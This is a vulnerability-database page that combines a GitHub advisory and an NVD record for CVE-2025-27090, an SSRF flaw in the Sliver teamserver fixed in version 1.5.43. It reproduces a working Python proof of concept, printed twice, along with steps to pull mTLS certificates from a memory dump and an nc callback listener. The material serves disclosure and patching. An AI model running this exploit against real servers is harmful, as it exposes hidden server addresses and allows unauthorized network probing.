// {{if .Config.Debug}}
sessionHandlerLog.Infof("[portfwd] Closing tunnel %d (%s)", tunnel.ID, reason)
// {{end}}
tunnel := rtunnels.GetRTunnel(tunnel.ID)
rtunnels.RemoveRTunnel(tunnel.ID)
dst.Close()
cancelContext()
}
go func() {
tWriter := tunnelWriter{
tun: tunnel,
conn: implantConn,
}
// portfwd only uses one reader, hence the tunnel.Readers[0]
n, err := io.Copy(tWriter, tunnel.Readers[0])
_ = n // avoid not used compiler error if debug mode is disabled
// {{if .Config.Debug}}
sessionHandlerLog.Infof("[tunnel] Tunnel done, wrote %v bytes", n)
// {{end}}
cleanup(err)
}()
tunnelDataCache.Add(tunnel.ID, req.Sequence, req)
// NOTE: The read/write semantics can be a little mind boggling, just remember we're reading
// from the server and writing to the tunnel's reader (e.g. stdout), so that's why ReadSequence
// is used here whereas WriteSequence is used for data written back to the server
// Go through cache and write all sequential data to the reader
for recv, ok := tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()); ok; recv, ok = tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()) {
// {{if .Config.Debug}}
//sessionHandlerLog.Infof("[tunnel] Write %d bytes to tunnel %d (read seq: %d)", len(recv.Data), recv.TunnelID, recv.Sequence)
// {{end}}
tunnel.Writer.Write(recv.Data)
// Delete the entry we just wrote from the cache
tunnelDataCache.DeleteSeq(tunnel.ID, tunnel.ReadSequence())
tunnel.IncReadSequence() // Increment sequence counter
// {{if .Config.Debug}}
//sessionHandlerLog.Infof("[message just received] %v", tunnelData)
// {{end}}
}
//If cache is building up it probably means a msg was lost and the server is currently hung waiting for it.
//Send a Resend packet to have the msg resent from the cache
if tunnelDataCache.Len(tunnel.ID) > 3 {
data, err := proto.Marshal(&sliverpb.TunnelData{
Sequence: tunnel.WriteSequence(), // The tunnel write sequence
Ack: tunnel.ReadSequence(),
Resend: true,
TunnelID: tunnel.ID,
Data: []byte{},
})
if err != nil {
// {{if .Config.Debug}}
//sessionHandlerLog.Infof("[shell] Failed to marshal protobuf %s", err)
// {{end}}
} else {
// {{if .Config.Debug}}
//sessionHandlerLog.Infof("[tunnel] Requesting resend of tunnelData seq: %d", tunnel.ReadSequence())
// {{end}}
implantConn.RequestResend(data)
}
}
return nil
}
Impact
For current POC, mostly just leaking teamserver origin IP behind redirectors. I am 99% sure you can get full read SSRF but POC is blind only right now
To exploit this for MTLS listeners, you will need MTLS keys For HTTP listeners, you will need to generate valid nonce Not sure about other transport types
POC
POC code, it is not cleaned up at all, please forgive me
#!/usr/bin/python
import sys
import time
import base64
import socket, ssl
from RogueSliver.consts import msgs
import random
import struct
import RogueSliver.sliver_pb2 as sliver
import json
import argparse
import uuid
from google.protobuf import json_format
from rich import print
import random
import string
ssl_ctx = ssl.create_default_context()
ssl_ctx.load_cert_chain(keyfile='certs/client.key',certfile='certs/client.crt')#,ca_certs='sliver/ca.crt')
ssl_ctx.load_verify_locations('certs/ca.crt')
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
def generate_random_string(length=8):
# Combine letters and digits
characters = string.ascii_letters + string.digits
# Generate random string
random_string = ''.join(random.choice(characters) for _ in range(length))
return random_string
def rand_unicode(junk_sz):
junk = ''.join([chr(random.randint(0,2047)) for x in range(junk_sz)]).encode('utf-8','surrogatepass').decode()
return(junk)
def junk_register(junk_sz):
n = generate_random_string()
register = {
"Name": "chebuya"+n,
"Hostname": "chebuya.local"+n,
"Uuid": "uuid"+n,
"Username": "username"+n,
"Uid": "uid"+n,
"Gid": "gid"+n,
"Os": "os"+n,
"Arch": "arch"+n,
"Pid": 10,
"Filename": "filename"+n,
"ActiveC2": "activec2"+n,
"Version": "version"+n,
"ReconnectInterval": 60,
"ConfigID": "config_id"+n,
"PeerID": -1,
"Locale": "locale" + n
}
return register
def make_ping_env():
reg = sliver.Ping()
json_format.Parse(json.dumps({}),reg)
envelope = sliver.Envelope()
envelope.Type = msgs.index('Ping')
envelope.Data = reg.SerializeToString()
return envelope
def make_rt_env():
jdata = {
"Data": "c3NyZiBwb2M=",
"Closed": False,
"Sequence": 0,
"Ack": 0,
"Resend": False,
"CreateReverse": True,
"rportfwd": {
"Port": int(sys.argv[4]),
"Host": sys.argv[3],
"TunnelID": 0,
},
"TunnelID": 0,
}
reg = sliver.TunnelData()
json_format.Parse(json.dumps(jdata),reg)
envelope = sliver.Envelope()
envelope.Type = msgs.index('TunnelData')
envelope.Data = reg.SerializeToString()
return envelope
def send_envelope(envelope,ip,port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
with ssl_ctx.wrap_socket(s,) as ssock:
ssock.connect((ip,port))
print(len(envelope.SerializeToString()))
#data_len = struct.pack('!I', len(envelope.SerializeToString()) )
data_len = struct.pack('I', len(envelope.SerializeToString()) )
envelope3 = make_rt_env()
data_len3 = struct.pack('I', len(envelope3.SerializeToString()) )
print(data_len)
ssock.write(data_len + envelope.SerializeToString())
ssock.write(data_len3 + envelope3.SerializeToString())
# No idea why this is reqauired
while True:
time.sleep(2)
ssock.write(data_len3 + envelope3.SerializeToString())
def register_session(ip,port):
print('[yellow]\[i][/yellow] Sending session registration.')
reg = sliver.Register()
json_format.Parse(json.dumps(junk_register(50)),reg)
envelope = sliver.Envelope()
envelope.Type = msgs.index('Register')
envelope.Data = reg.SerializeToString()
send_envelope(envelope,ip,port)
def register_beacon(ip,port):
print('[yellow]\[i][/yellow] Sending beacon registration.')
reg = sliver.BeaconRegister()
reg.ID = str(uuid.uuid4())
junk_sz = 50
reg.Interval = random.randint(0,10*junk_sz)
reg.Jitter = random.randint(0,10*junk_sz)
reg.NextCheckin = random.randint(0,10*junk_sz)
json_format.Parse(json.dumps(junk_register(junk_sz)),reg.Register)
envelope = sliver.Envelope()
envelope.Type = msgs.index('BeaconRegister')
envelope.Data = reg.SerializeToString()
send_envelope(envelope,ip,port)
description = '''
Flood a Sliver C2 server with beacons and sessions. Requires an mtls certificate.
'''
if __name__ == '__main__':
register_session(sys.argv[1], int(sys.argv[2]))
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.5.42"
},
"package": {
"ecosystem": "Go",
"name": "github.com/bishopfox/sliver"
},
"ranges": [
{
"events": [
{
"introduced": "1.5.26"
},
{
"fixed": "1.5.43"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27090"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-19T21:11:33Z",
"nvd_published_at": "2025-02-19T22:15:24Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so\n\n\n### Reproduction steps\nRun server\n```\nwget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux\nchmod +x sliver-server_linux\n./sliver-server_linux\n```\n\nGenerate binary\n```\ngenerate --mtls 127.0.0.1:8443\n```\n\nRun it on windows, then `Task manager -\u003e find process -\u003e Create memory dump file`\n\n\nInstall RogueSliver and get the certs\n```\ngit clone https://github.com/ACE-Responder/RogueSliver.git\npip3 install -r requirements.txt --break-system-packages\npython3 ExtractCerts.py implant.dmp\n```\n\nStart callback listener. Teamserver will connect when POC is run and send \"ssrf poc\" to nc\n```\nnc -nvlp 1111\n```\n\nRun the poc (pasted at bottom of this file)\n```\npython3 poc.py \u003cSLIVER IP\u003e \u003cMTLS PORT\u003e \u003cCALLBACK IP\u003e \u003cCALLBACK PORT\u003e\npython3 poc.py 192.168.1.33 8443 44.221.186.72 1111\n```\n\n\n### Details\nWe see here an envelope is read from the connection and if the envelope.Type matches a handler the handler will be executed\n```go\nfunc handleSliverConnection(conn net.Conn) {\n\tmtlsLog.Infof(\"Accepted incoming connection: %s\", conn.RemoteAddr())\n\timplantConn := core.NewImplantConnection(consts.MtlsStr, conn.RemoteAddr().String())\n\n\tdefer func() {\n\t\tmtlsLog.Debugf(\"mtls connection closing\")\n\t\tconn.Close()\n\t\timplantConn.Cleanup()\n\t}()\n\n\tdone := make(chan bool)\n\tgo func() {\n\t\tdefer func() {\n\t\t\tdone \u003c- true\n\t\t}()\n\t\thandlers := serverHandlers.GetHandlers()\n\t\tfor {\n\t\t\tenvelope, err := socketReadEnvelope(conn)\n\t\t\tif err != nil {\n\t\t\t\tmtlsLog.Errorf(\"Socket read error %v\", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t\timplantConn.UpdateLastMessage()\n\t\t\tif envelope.ID != 0 {\n\t\t\t\timplantConn.RespMutex.RLock()\n\t\t\t\tif resp, ok := implantConn.Resp[envelope.ID]; ok {\n\t\t\t\t\tresp \u003c- envelope // Could deadlock, maybe want to investigate better solutions\n\t\t\t\t}\n\t\t\t\timplantConn.RespMutex.RUnlock()\n\t\t\t} else if handler, ok := handlers[envelope.Type]; ok {\n\t\t\t\tmtlsLog.Debugf(\"Received new mtls message type %d, data: %s\", envelope.Type, envelope.Data)\n\t\t\t\tgo func() {\n\t\t\t\t\trespEnvelope := handler(implantConn, envelope.Data)\n\t\t\t\t\tif respEnvelope != nil {\n\t\t\t\t\t\timplantConn.Send \u003c- respEnvelope\n\t\t\t\t\t}\n\t\t\t\t}()\n\t\t\t}\n\t\t}\n\t}()\n\nLoop:\n\tfor {\n\t\tselect {\n\t\tcase envelope := \u003c-implantConn.Send:\n\t\t\terr := socketWriteEnvelope(conn, envelope)\n\t\t\tif err != nil {\n\t\t\t\tmtlsLog.Errorf(\"Socket write failed %v\", err)\n\t\t\t\tbreak Loop\n\t\t\t}\n\t\tcase \u003c-done:\n\t\t\tbreak Loop\n\t\t}\n\t}\n\tmtlsLog.Debugf(\"Closing implant connection %s\", implantConn.ID)\n}\n```\n\nThe available handlers:\n```go\nfunc GetHandlers() map[uint32]ServerHandler {\n\treturn map[uint32]ServerHandler{\n\t\t// Sessions\n\t\tsliverpb.MsgRegister: registerSessionHandler,\n\t\tsliverpb.MsgTunnelData: tunnelDataHandler,\n\t\tsliverpb.MsgTunnelClose: tunnelCloseHandler,\n\t\tsliverpb.MsgPing: pingHandler,\n\t\tsliverpb.MsgSocksData: socksDataHandler,\n\n\t\t// Beacons\n\t\tsliverpb.MsgBeaconRegister: beaconRegisterHandler,\n\t\tsliverpb.MsgBeaconTasks: beaconTasksHandler,\n\n\t\t// Pivots\n\t\tsliverpb.MsgPivotPeerEnvelope: pivotPeerEnvelopeHandler,\n\t\tsliverpb.MsgPivotPeerFailure: pivotPeerFailureHandler,\n\t}\n}\n```\n\nIf we send an envelope with the envelope.Type equaling MsgTunnelData, we will enter the `tunnelDataHandler` function\n```go\n// The handler mutex prevents a send on a closed channel, without it\n// two handlers calls may race when a tunnel is quickly created and closed.\nfunc tunnelDataHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope {\n\tsession := core.Sessions.FromImplantConnection(implantConn)\n\tif session == nil {\n\t\tsessionHandlerLog.Warnf(\"Received tunnel data from unknown session: %v\", implantConn)\n\t\treturn nil\n\t}\n\ttunnelHandlerMutex.Lock()\n\tdefer tunnelHandlerMutex.Unlock()\n\ttunnelData := \u0026sliverpb.TunnelData{}\n\tproto.Unmarshal(data, tunnelData)\n\n\tsessionHandlerLog.Debugf(\"[DATA] Sequence on tunnel %d, %d, data: %s\", tunnelData.TunnelID, tunnelData.Sequence, tunnelData.Data)\n\n\trtunnel := rtunnels.GetRTunnel(tunnelData.TunnelID)\n\tif rtunnel != nil \u0026\u0026 session.ID == rtunnel.SessionID {\n\t\tRTunnelDataHandler(tunnelData, rtunnel, implantConn)\n\t} else if rtunnel != nil \u0026\u0026 session.ID != rtunnel.SessionID {\n\t\tsessionHandlerLog.Warnf(\"Warning: Session %s attempted to send data on reverse tunnel it did not own\", session.ID)\n\t} else if rtunnel == nil \u0026\u0026 tunnelData.CreateReverse == true {\n\t\tcreateReverseTunnelHandler(implantConn, data)\n\t\t//RTunnelDataHandler(tunnelData, rtunnel, implantConn)\n\t} else {\n\t\ttunnel := core.Tunnels.Get(tunnelData.TunnelID)\n\t\tif tunnel != nil {\n\t\t\tif session.ID == tunnel.SessionID {\n\t\t\t\ttunnel.SendDataFromImplant(tunnelData)\n\t\t\t} else {\n\t\t\t\tsessionHandlerLog.Warnf(\"Warning: Session %s attempted to send data on tunnel it did not own\", session.ID)\n\t\t\t}\n\t\t} else {\n\t\t\tsessionHandlerLog.Warnf(\"Data sent on nil tunnel %d\", tunnelData.TunnelID)\n\t\t}\n\t}\n\n\treturn nil\n}\n```\n\n\nThe `createReverseTunnelHandler` reads the envelope, creating a socket for `req.Rportfwd.Host` and `req.Rportfwd.Port`. It will write `recv.Data` to it\n```go\nfunc createReverseTunnelHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope {\n\tsession := core.Sessions.FromImplantConnection(implantConn)\n\n\treq := \u0026sliverpb.TunnelData{}\n\tproto.Unmarshal(data, req)\n\n\tvar defaultDialer = new(net.Dialer)\n\n\tremoteAddress := fmt.Sprintf(\"%s:%d\", req.Rportfwd.Host, req.Rportfwd.Port)\n\n\tctx, cancelContext := context.WithCancel(context.Background())\n\n\tdst, err := defaultDialer.DialContext(ctx, \"tcp\", remoteAddress)\n\t//dst, err := net.Dial(\"tcp\", remoteAddress)\n\tif err != nil {\n\t\ttunnelClose, _ := proto.Marshal(\u0026sliverpb.TunnelData{\n\t\t\tClosed: true,\n\t\t\tTunnelID: req.TunnelID,\n\t\t})\n\t\timplantConn.Send \u003c- \u0026sliverpb.Envelope{\n\t\t\tType: sliverpb.MsgTunnelClose,\n\t\t\tData: tunnelClose,\n\t\t}\n\t\tcancelContext()\n\t\treturn nil\n\t}\n\n\tif conn, ok := dst.(*net.TCPConn); ok {\n\t\t// {{if .Config.Debug}}\n\t\t//log.Printf(\"[portfwd] Configuring keep alive\")\n\t\t// {{end}}\n\t\tconn.SetKeepAlive(true)\n\t\t// TODO: Make KeepAlive configurable\n\t\tconn.SetKeepAlivePeriod(1000 * time.Second)\n\t}\n\n\ttunnel := rtunnels.NewRTunnel(req.TunnelID, session.ID, dst, dst)\n\trtunnels.AddRTunnel(tunnel)\n\tcleanup := func(reason error) {\n\t\t// {{if .Config.Debug}}\n\t\tsessionHandlerLog.Infof(\"[portfwd] Closing tunnel %d (%s)\", tunnel.ID, reason)\n\t\t// {{end}}\n\t\ttunnel := rtunnels.GetRTunnel(tunnel.ID)\n\t\trtunnels.RemoveRTunnel(tunnel.ID)\n\t\tdst.Close()\n\t\tcancelContext()\n\t}\n\n\tgo func() {\n\t\ttWriter := tunnelWriter{\n\t\t\ttun: tunnel,\n\t\t\tconn: implantConn,\n\t\t}\n\t\t// portfwd only uses one reader, hence the tunnel.Readers[0]\n\t\tn, err := io.Copy(tWriter, tunnel.Readers[0])\n\t\t_ = n // avoid not used compiler error if debug mode is disabled\n\t\t// {{if .Config.Debug}}\n\t\tsessionHandlerLog.Infof(\"[tunnel] Tunnel done, wrote %v bytes\", n)\n\t\t// {{end}}\n\n\t\tcleanup(err)\n\t}()\n\n\ttunnelDataCache.Add(tunnel.ID, req.Sequence, req)\n\n\t// NOTE: The read/write semantics can be a little mind boggling, just remember we\u0027re reading\n\t// from the server and writing to the tunnel\u0027s reader (e.g. stdout), so that\u0027s why ReadSequence\n\t// is used here whereas WriteSequence is used for data written back to the server\n\n\t// Go through cache and write all sequential data to the reader\n\tfor recv, ok := tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()); ok; recv, ok = tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()) {\n\t\t// {{if .Config.Debug}}\n\t\t//sessionHandlerLog.Infof(\"[tunnel] Write %d bytes to tunnel %d (read seq: %d)\", len(recv.Data), recv.TunnelID, recv.Sequence)\n\t\t// {{end}}\n\t\ttunnel.Writer.Write(recv.Data)\n\n\t\t// Delete the entry we just wrote from the cache\n\t\ttunnelDataCache.DeleteSeq(tunnel.ID, tunnel.ReadSequence())\n\t\ttunnel.IncReadSequence() // Increment sequence counter\n\n\t\t// {{if .Config.Debug}}\n\t\t//sessionHandlerLog.Infof(\"[message just received] %v\", tunnelData)\n\t\t// {{end}}\n\t}\n\n\t//If cache is building up it probably means a msg was lost and the server is currently hung waiting for it.\n\t//Send a Resend packet to have the msg resent from the cache\n\tif tunnelDataCache.Len(tunnel.ID) \u003e 3 {\n\t\tdata, err := proto.Marshal(\u0026sliverpb.TunnelData{\n\t\t\tSequence: tunnel.WriteSequence(), // The tunnel write sequence\n\t\t\tAck: tunnel.ReadSequence(),\n\t\t\tResend: true,\n\t\t\tTunnelID: tunnel.ID,\n\t\t\tData: []byte{},\n\t\t})\n\t\tif err != nil {\n\t\t\t// {{if .Config.Debug}}\n\t\t\t//sessionHandlerLog.Infof(\"[shell] Failed to marshal protobuf %s\", err)\n\t\t\t// {{end}}\n\t\t} else {\n\t\t\t// {{if .Config.Debug}}\n\t\t\t//sessionHandlerLog.Infof(\"[tunnel] Requesting resend of tunnelData seq: %d\", tunnel.ReadSequence())\n\t\t\t// {{end}}\n\t\t\timplantConn.RequestResend(data)\n\t\t}\n\t}\n\treturn nil\n}\n```\n\n\n\n### Impact\nFor current POC, mostly just leaking teamserver origin IP behind redirectors. I am 99% sure you can get full read SSRF but POC is blind only right now\n\nTo exploit this for MTLS listeners, you will need MTLS keys\nFor HTTP listeners, you will need to generate valid nonce\nNot sure about other transport types\n\n\n\n### POC\nPOC code, it is not cleaned up at all, please forgive me\n```python\n#!/usr/bin/python\nimport sys\nimport time\nimport base64\nimport socket, ssl\nfrom RogueSliver.consts import msgs\nimport random\nimport struct\nimport RogueSliver.sliver_pb2 as sliver\nimport json\nimport argparse\nimport uuid\nfrom google.protobuf import json_format\nfrom rich import print\nimport random\nimport string\n\nssl_ctx = ssl.create_default_context()\nssl_ctx.load_cert_chain(keyfile=\u0027certs/client.key\u0027,certfile=\u0027certs/client.crt\u0027)#,ca_certs=\u0027sliver/ca.crt\u0027)\nssl_ctx.load_verify_locations(\u0027certs/ca.crt\u0027)\nssl_ctx.check_hostname = False\nssl_ctx.verify_mode = ssl.CERT_NONE\n\n\n\ndef generate_random_string(length=8):\n # Combine letters and digits\n characters = string.ascii_letters + string.digits\n # Generate random string\n random_string = \u0027\u0027.join(random.choice(characters) for _ in range(length))\n return random_string\n\ndef rand_unicode(junk_sz):\n junk = \u0027\u0027.join([chr(random.randint(0,2047)) for x in range(junk_sz)]).encode(\u0027utf-8\u0027,\u0027surrogatepass\u0027).decode()\n return(junk)\n\ndef junk_register(junk_sz):\n n = generate_random_string()\n register = {\n \"Name\": \"chebuya\"+n,\n \"Hostname\": \"chebuya.local\"+n,\n \"Uuid\": \"uuid\"+n,\n \"Username\": \"username\"+n,\n \"Uid\": \"uid\"+n,\n \"Gid\": \"gid\"+n,\n \"Os\": \"os\"+n,\n \"Arch\": \"arch\"+n,\n \"Pid\": 10,\n \"Filename\": \"filename\"+n,\n \"ActiveC2\": \"activec2\"+n,\n \"Version\": \"version\"+n,\n \"ReconnectInterval\": 60,\n \"ConfigID\": \"config_id\"+n,\n \"PeerID\": -1,\n \"Locale\": \"locale\" + n\n }\n\n return register\n\n\n\ndef make_ping_env():\n reg = sliver.Ping()\n json_format.Parse(json.dumps({}),reg)\n envelope = sliver.Envelope()\n envelope.Type = msgs.index(\u0027Ping\u0027)\n envelope.Data = reg.SerializeToString()\n\n return envelope\n\n\n\ndef make_rt_env():\n \n jdata = {\n \"Data\": \"c3NyZiBwb2M=\",\n \"Closed\": False,\n \"Sequence\": 0,\n \"Ack\": 0,\n \"Resend\": False,\n \"CreateReverse\": True,\n \"rportfwd\": {\n \"Port\": int(sys.argv[4]),\n \"Host\": sys.argv[3],\n \"TunnelID\": 0,\n },\n \"TunnelID\": 0,\n }\n\n\n\n reg = sliver.TunnelData()\n json_format.Parse(json.dumps(jdata),reg)\n envelope = sliver.Envelope()\n envelope.Type = msgs.index(\u0027TunnelData\u0027)\n envelope.Data = reg.SerializeToString()\n\n return envelope\n\n\n\n\ndef send_envelope(envelope,ip,port):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n with ssl_ctx.wrap_socket(s,) as ssock:\n ssock.connect((ip,port))\n\n print(len(envelope.SerializeToString()))\n #data_len = struct.pack(\u0027!I\u0027, len(envelope.SerializeToString()) )\n data_len = struct.pack(\u0027I\u0027, len(envelope.SerializeToString()) )\n\n\n\n\n envelope3 = make_rt_env()\n data_len3 = struct.pack(\u0027I\u0027, len(envelope3.SerializeToString()) )\n\n print(data_len)\n\n ssock.write(data_len + envelope.SerializeToString()) \n ssock.write(data_len3 + envelope3.SerializeToString())\n\n\n\n \n # No idea why this is reqauired\n while True:\n time.sleep(2)\n ssock.write(data_len3 + envelope3.SerializeToString())\n\n\n\ndef register_session(ip,port):\n print(\u0027[yellow]\\[i][/yellow] Sending session registration.\u0027)\n reg = sliver.Register()\n json_format.Parse(json.dumps(junk_register(50)),reg)\n envelope = sliver.Envelope()\n envelope.Type = msgs.index(\u0027Register\u0027)\n envelope.Data = reg.SerializeToString()\n send_envelope(envelope,ip,port)\n\ndef register_beacon(ip,port):\n print(\u0027[yellow]\\[i][/yellow] Sending beacon registration.\u0027)\n reg = sliver.BeaconRegister()\n reg.ID = str(uuid.uuid4())\n junk_sz = 50\n reg.Interval = random.randint(0,10*junk_sz)\n reg.Jitter = random.randint(0,10*junk_sz)\n reg.NextCheckin = random.randint(0,10*junk_sz)\n json_format.Parse(json.dumps(junk_register(junk_sz)),reg.Register)\n envelope = sliver.Envelope()\n envelope.Type = msgs.index(\u0027BeaconRegister\u0027)\n envelope.Data = reg.SerializeToString()\n send_envelope(envelope,ip,port)\n\ndescription = \u0027\u0027\u0027\nFlood a Sliver C2 server with beacons and sessions. Requires an mtls certificate.\n\u0027\u0027\u0027\n\nif __name__ == \u0027__main__\u0027:\n register_session(sys.argv[1], int(sys.argv[2]))\n```",
"id": "GHSA-fh4v-v779-4g2w",
"modified": "2025-02-20T22:47:01Z",
"published": "2025-02-19T21:11:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-fh4v-v779-4g2w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27090"
},
{
"type": "WEB",
"url": "https://github.com/BishopFox/sliver/commit/0f340a25cf3d496ed870dae7da39eab4427bc16f"
},
{
"type": "WEB",
"url": "https://github.com/BishopFox/sliver/commit/10e245326070c6a5884a02e0790bb7e2baefb3a1"
},
{
"type": "PACKAGE",
"url": "https://github.com/BishopFox/sliver"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "SSRF in sliver teamserver"
}
FKIE_CVE-2025-27090
Vulnerability from fkie_nvd - Published: 2025-02-19 22:15 - Updated: 2025-02-27 20:30
Severity ?
Summary
Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server's IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bishopfox:sliver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6109E798-21E6-4BD3-A1FE-103E1F5E90AF",
"versionEndExcluding": "1.5.43",
"versionStartIncluding": "1.5.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server\u0027s IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability."
},
{
"lang": "es",
"value": "Sliver es una emulaci\u00f3n adversaria cruzada de c\u00f3digo abierto/equipo rojo framework, las organizaciones de todos los tama\u00f1os pueden utilizar las pruebas de seguridad. El reenv\u00edo de puerto inverso en Sliver TeamServer permite al implante abrir un t\u00fanel inverso en el servidor de equipos de Sliver sin verificar si el operador instruy\u00f3 al implante que lo hiciera. El \u00fanico impacto que se ha demostrado es la exposici\u00f3n de la direcci\u00f3n IP del servidor a un tercero. Este problema se ha abordado en la versi\u00f3n 1.5.43 y se recomienda a todos los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad."
}
],
"id": "CVE-2025-27090",
"lastModified": "2025-02-27T20:30:33.563",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-02-19T22:15:24.247",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/BishopFox/sliver/commit/0f340a25cf3d496ed870dae7da39eab4427bc16f"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/BishopFox/sliver/commit/10e245326070c6a5884a02e0790bb7e2baefb3a1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-fh4v-v779-4g2w"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…